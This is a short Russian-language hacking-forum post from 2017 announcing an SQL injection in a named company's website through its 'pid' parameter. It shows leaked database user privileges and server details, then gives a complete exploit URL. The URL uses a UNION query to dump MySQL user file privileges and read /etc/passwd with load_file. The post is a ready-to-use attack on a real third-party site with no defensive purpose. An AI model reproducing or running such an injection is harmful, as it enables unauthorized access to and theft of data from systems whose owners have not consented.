
26.05.2017, 14:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 14926
Репутация:
17
|
|
Сайт:ene.com.tw
SQLi черз GET с чтением файла из файловой системы, уязвимый параметр pid
root:Y,root:Y,root:Y,:N,:N,enemysql:N,enemysql:Y.
enemysql@localhost:5.1.73:redhat-linux-gnu:x86_64:/var/log/mysqld.log.
Эксплоит:
Код:
Code:
http://www.ene.com.tw/english/ir/newsdetail.php?fid=14&pid=-1' union all select 1,2,3,group_concat(user,0x3a,file_priv),5,@@version,load_file('/etc/passwd'),8,9,10 from mysql.user --+
|
|
|
|